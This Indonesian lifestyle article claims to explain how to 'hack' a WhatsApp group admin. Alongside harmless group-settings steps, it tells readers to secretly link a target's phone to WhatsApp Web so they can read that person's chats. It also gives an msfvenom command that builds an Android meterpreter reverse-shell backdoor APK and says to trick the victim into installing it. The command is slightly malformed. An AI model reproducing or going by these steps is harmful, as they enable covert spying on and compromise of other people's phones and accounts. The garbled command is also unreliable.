Cara Hack Admin Grup WhatsApp yang Tepat, Bisa Menggunakan Aplikasi Tambahan - Lewat Pengaturan

Diterbitkan:

Cara Hack Admin Grup WhatsApp yang Tepat, Bisa Menggunakan Aplikasi Tambahan - Lewat Pengaturan
Ilustrasi (credit: Pexels)

Kapanlagi.com - WhatsApp menjadi salah satu aplikasi yang digunakan sebagai sarana komunikasi canggih. Bahkan, ada banyak sekali layanan yang diberikan oleh aplikasi WhatsApp ini. Salah satunya grup, namun bagi KLovers yang ingin melakukan cara hack admin grup WhatsApp, maka ada tahapannya loh.

Ya, terkadang ada saja admin grup yang merugikan sebuah grup. Hingga, jalan satu-satunya yaitu dengan mengeluarkannya. Ada beberapa cara hack admin grup WhatsApp yang bisa KLovers lakukan dengan mudah dan praktis. Namun, perlu diingat bahwa beberapa cara hack admin grup WhatsApp ini bisa mengganggu privasi seseorang.

Tetapi, bila ini mendesak dan untuk keperluan yang baik, maka bisa kalian gunakan. Untuk itu dilansir dari berbagai sumber, berikut ini cara hack admin grup WhatsApp yang bisa kalian lakukan dengan tepat. Ada cara hack admin grup WhatsApp menggunakan aplikasi tambahan hingga tanpa aplikasi sekalipun.

 

 

1. Menggunakan Pengaturan WhatsApp

Cara hack admin grup WhatsApp yang pertama yaitu, kalian bisa menggunakan pengaturan pada aplikasi WhatsApp. Ya, cara ini bisa menjadi cara awal untuk KLovers bila ingin mengeluarkan seorang admin di grup WhatsApp. Dan berikut ini cara hack admin grup WhatsApp dengan menggunakan pengaturan.

1. Pertama, kalian bisa membuka obrolan grup WhatsApp seperti biasa.

2. Setelah itu, kalian bisa langsung ketuk subjek grup.

3. Kemudian ketuk "Setelan Grup" dan pilih "Edit Admin Grup".

4. Ketuk tanda centang pengguna yang mau kalian hapus sebagai admin.

5. Namun perlu diingat ya KLovers, orang yang membuat grup (admin awal) tidak bisa dihapus sebagai admin WhatsApp. Statusnya sebagai admin baru bisa hilang jika dirinya keluar dari grup.

 

 

(Ayo ikuti saluran WhatsApp KapanLagi.com biar enggak ketinggalan update dan berita terbaru seputar dunia hiburan tanah air dan juga luar negeri. Klik di sini ya, Klovers!)

2. Menggunakan WhatsApp Web

Kemudian kalian juga bisa melakukan cara hack admin grup WhatsApp dengan menggunakan WhatsApp Web. Ya, cara ini bisa kalian lakukan bila kalian ingin membuat seseorang keluar dari sebuah admin keluar dari grup WhatsApp. Berikut ini beberapa cara hack admin grup WhatsApp dengan menggunakan WhatsApp Web tersebut.

1. Siapkan laptop jika ingin sadap Whatsapp melalui PC.

2. Kemudian pastikan internet telah tersambung, lalu buka situs Whatsapp Web melalui Google.

3. Setelah itu, pastikan aplikasi WhatsApp smartphone orang ingin kalian retas telah diubah menjadi Web Whatsapp ya KLovers.

4. Cara mengeceknya yakni buka aplikasi Whatsapp, lalu pilih titik tiga bagian pojok atas.

5. Kemudian kalian bisa pilih perangkat tertaut, lalu aktifkan.

6. Setelah itu akan muncul scan barcode, kemudian masuk ke halaman situs Web Whatsapp, lalu scan barcode tersebut.

7. Ketika sudah berhasil, nantinya akan langsung masuk ke dalam aplikasi WhatsApp smartphone orang ingin kalian retas melalui Web Whatsapp.

8. Setelah berhasil, kalian bisa melihat history chat, panggilan, status, hingga mengeluarkan orang tersebut dari grup WhatsApp.

 

 

3. Menjadi Admin Grup WhatsApp

Kemudian cara hack admin grup WhatsApp yang kedua yaitu, dengan menjadi seorang admin di grup WhatsApp. Ya, cara ini bisa jadi solusi bila kalian bukan seorang admin di sebuah grup WhatsApp, namun ingin mengeluarkan admin di grup tersebut. Dan berikut ini cara hack admin grup WhatsApp dengan menjadi admin grup WhatsApp.

1. Pastikan kalian memiliki kriteria untuk jadi admin grup ya KLovers.

2. Setelah itu, kalian bisa membuka Whatsapp. Lalu Hubungi Admin Grup.

3. Minta sang admin untuk memasukkan kalian menjadi admin.

4. Setelah kalian masuk dan menjadi seorang admin, kalian bisa langsung ke "Informasi Grup"

5. Bila sudah, maka kalian bisa klik "Pilih Kontak" yang mau dijadikan admin atau keluarkan jadi admin.

6. Terakhir, klik "Keluarkan Admin" dan selesai.

 

 

4. Menggunakan Aplikasi Termux

Dan cara hack admin grup WhatsApp yang terakhir yaitu dengan menggunakan aplikasi Termux. Ya, aplikasi ini bisa kalian gunakan sebagai salah satu cara hack admin grup WhatsApp yang kalian dengan mudah dan praktis. Dan berikut beberapa cara hack admin grup WhatsApp dengan menggunakan aplikasi Termux tersebut.

1. Download dan Install aplikasi Termux melalui Google Play Store.

2. Setelah di install, buka aplikasi Termux di HP kalian.

3. Lalu periksa alamat IP sendiri dengan mengetik IpConfig pada aplikasi Termux.

4. Ketikkan Script msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.166=4444 R >hack.apk

5. Lalu pada kalimat "LHOST" silahkan Ganti dengan alamat IP sendiri.

6. Jika sudah selesai, Lihat file backdoor yang sudah jadi dengan membuka menu "File", setelah itu "Home", dan hack.apk

7. Kirim File Backdoor tadi ke orang yang mau dihack. Dan buat target menginstall Aplikasi yang kalian kirim tadi.

8. Setelah sudah berhasil menginstall file apk yang kalian kirimkan, maka kalian bisa melihat aktifitas akun whatsapp yang dihack tadi.

Itulah beberapa cara hack admin grup WhatsApp yang bisa KLovers lakukan dengan mudah dan praktis. Kalian bisa melakukannya menggunakan aplikasi tambahan hingga pengaturan. Namun, hal ini tidak untuk digunakan untuk hal-hal yang bersifat merugikan ya KLovers. Selamat mencoba.

 

 

(Ayo ikuti saluran WhatsApp KapanLagi.com biar enggak ketinggalan update dan berita terbaru seputar dunia hiburan tanah air dan juga luar negeri. Klik di sini ya, Klovers!)

Rekomendasi
Trending